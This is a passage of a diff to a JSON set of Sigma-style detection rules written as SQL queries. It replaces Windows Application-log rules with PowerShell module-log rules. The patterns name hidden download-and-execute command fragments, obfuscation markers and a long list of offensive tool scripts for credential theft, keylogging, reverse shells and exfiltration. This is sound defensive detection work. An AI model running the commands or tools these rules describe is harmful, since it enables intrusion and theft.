PowerShell Module", + "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "status": "experimental", - "description": "Detects MSI package installation from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_msi_install_from_susp_locations.yml" + "filename": "posh_pm_invoke_obfuscation_via_compress.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL 
server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects 
suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE 
'%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo 
LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Zip A Folder With PowerShell For 
Staging In Temp - PowerShell Module", + "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_susp_zip_compress.yml" }, { - "title": "MSI Installation From Web", - "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", + "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", "status": "experimental", - "description": "Detects installation of a remote msi file from web.", - "author": "Stamatis Chatzimangou", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218", - "attack.t1218.007" + "attack.t1059.001" ], 
